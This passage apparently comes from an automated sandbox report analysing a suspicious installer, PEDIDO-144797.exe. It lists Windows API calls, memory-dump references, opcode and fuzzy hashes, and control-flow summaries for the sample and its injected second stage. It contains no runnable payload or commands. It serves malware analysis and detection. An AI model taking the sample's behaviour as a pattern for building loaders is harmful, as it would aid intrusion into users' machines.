                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                          • Opcode ID: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                          • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                                                                                          • Opcode Fuzzy Hash: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                                                                                          • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                                                                                          APIs
                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                          • String ID: !
                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                          • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                          • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                                                                                          • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                                                                                          • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3
                                                                                                                                          Strings
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-3355392842
• Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
• Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
• Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
• Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
APIs
  • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
  • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405D3A
  • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
  • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
• lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405DE2
• GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0), ref: 00405DF2
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: 0_B
• API String ID: 3248276644-2128305573
• Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
• Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
• Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
• Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
APIs
• IsWindowVisible.USER32(?), ref: 004053B7
• CallWindowProcW.USER32(?,?,?,?), ref: 00405408
  • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
• Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
• Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
• Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
APIs
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,004064F2,80000002), ref: 004062C4
• RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 004062CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: Call
• API String ID: 3356406503-1824292864
• Opcode ID: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
• Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
• Opcode Fuzzy Hash: eb1f67c4e7283d14696156d079f1c46a9bcf05f485b6848abf2eef10094c0e69
• Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
APIs
• FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77762EE0,00403A00,77763420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
• GlobalFree.KERNEL32(?), ref: 00403A4A
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3355392842
• Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
• Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
• Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
• Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144797.exe,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405CD3
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144797.exe,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405CE3
Strings
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3370423016
• Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
• Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
• Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
• Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
APIs
• GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
• GlobalFree.KERNEL32(00000000), ref: 100011C7
• GlobalFree.KERNEL32(00000000), ref: 100011D9
• GlobalFree.KERNEL32(?), ref: 10001203
Memory Dump Source
• Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
Similarity
                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                          APIs
                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                          • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                          • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                                                                                          • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                          • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

Execution Graph

Execution Coverage: 0%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 100%
Total number of Nodes: 1
Total number of Limit Nodes: 0
execution_graph 46246 326e2b90 LdrInitializeThunk

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 4 326e34e0-326e34ec LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 29eb848ae944e40f42bf0bbc0020cbecfa30b94e1ea59982d9da85d509d4ea6c
• Instruction ID: 8bdc4b6d0b2fd5b12e00736643169c39608d7244a3250df445b20e31a4304daf
• Opcode Fuzzy Hash: 29eb848ae944e40f42bf0bbc0020cbecfa30b94e1ea59982d9da85d509d4ea6c
• Instruction Fuzzy Hash: FD90023160520412DD00655C571471620054BD0211F61D856A0524928DC7A6896575A2

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1 326e2bc0-326e2bcc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ed7d3b0dfc94d3e7ec5db12ec0619ebf64a0705dde9a315479cb197e265b3d5a
• Instruction ID: 46962f79e8601e565172ef6dd4946216a8076b4320625e560e4d5391755667f4
• Opcode Fuzzy Hash: ed7d3b0dfc94d3e7ec5db12ec0619ebf64a0705dde9a315479cb197e265b3d5a
• Instruction Fuzzy Hash: BC90023120110412DD00699C670865610054BE0311F51E456A5124915EC67688A57131

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 326e2b90-326e2b9c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6bf043d9f87eaf3a449555eef62ec6a4411026f3eb621cdb28489937bc5c873b
• Instruction ID: 95cde7a0f3c77eee0c18841d772b299a4aaf04fae6cb9f23314fb1d86003b144
• Opcode Fuzzy Hash: 6bf043d9f87eaf3a449555eef62ec6a4411026f3eb621cdb28489937bc5c873b
• Instruction Fuzzy Hash: 8E90023120118812DD10655C970475A10054BD0311F55D856A4524A18DC6A688A57121

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 3 326e2eb0-326e2ebc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 5907d60f186e7222f94c4a83a6d351250750ae3472c8f11a0a7a29aefb4dfc1e
• Instruction ID: 3c87a3aa20816252be9b924d8a334e149e9df08e7a3e53b25ed76b326c579db9
• Opcode Fuzzy Hash: 5907d60f186e7222f94c4a83a6d351250750ae3472c8f11a0a7a29aefb4dfc1e
• Instruction Fuzzy Hash: 5E90023120150412DD00655C5B1471B10054BD0312F51D456A1264915DC63688657571

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 2 326e2d10-326e2d1c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c403b65493fdb127e3c7605e2e5cca498738786f4d984a86a937214628c91457
• Instruction ID: d0fca87045f15aa7fb7d69dffe37045907ba3510919389ea194dd68d78349e0c
• Opcode Fuzzy Hash: c403b65493fdb127e3c7605e2e5cca498738786f4d984a86a937214628c91457
• Instruction Fuzzy Hash: 5590023120110423DD11655C570471710094BD0251F91D857A0524918DD6678966B121

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $ $0
• API String ID: 3446177414-3352262554
• Opcode ID: 46841807dc2d1fd76d538af668ca9ba225872c99a540225cfdf2a9e7bd9f67e9
• Instruction ID: 20234382740a35fe8be2d8b8cc694f9edb4f07c63e53aa4708a0f1f474ecee15
• Opcode Fuzzy Hash: 46841807dc2d1fd76d538af668ca9ba225872c99a540225cfdf2a9e7bd9f67e9
• Instruction Fuzzy Hash: 713204B1608381CFE350CF68C984B5BBBE5BF88348F00492EF5999B250DB75E949CB52

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: [rendered control-flow graph of the function starting at 3269d2ec; node and edge data omitted. Named calls visible in the graph: GetPEB, plus internal subroutines 3275bd08, 326e5050, 326e2ab0, 32697220, 326b3bc0, 326c3262, 3269d736, 326e2a80, 3275ad61, 3269d8d0, 3269d64a, 326b5d90, 326c4ca6]
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.l2
• API String ID: 0-1596040379
• Opcode ID: 460db15222c613517911fbeb536a592e09d5aeacc95ac5051b16eb11c540d96d
• Instruction ID: f9a8fa8227d06d539238192e869f834ad05f1d9a4cd839bb74183a6891485926
• Opcode Fuzzy Hash: 460db15222c613517911fbeb536a592e09d5aeacc95ac5051b16eb11c540d96d
• Instruction Fuzzy Hash: C5B18AB6508341AFD715DF28C980B9FB7E8AF88758F41492EF985D7241DB70D908CB92
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
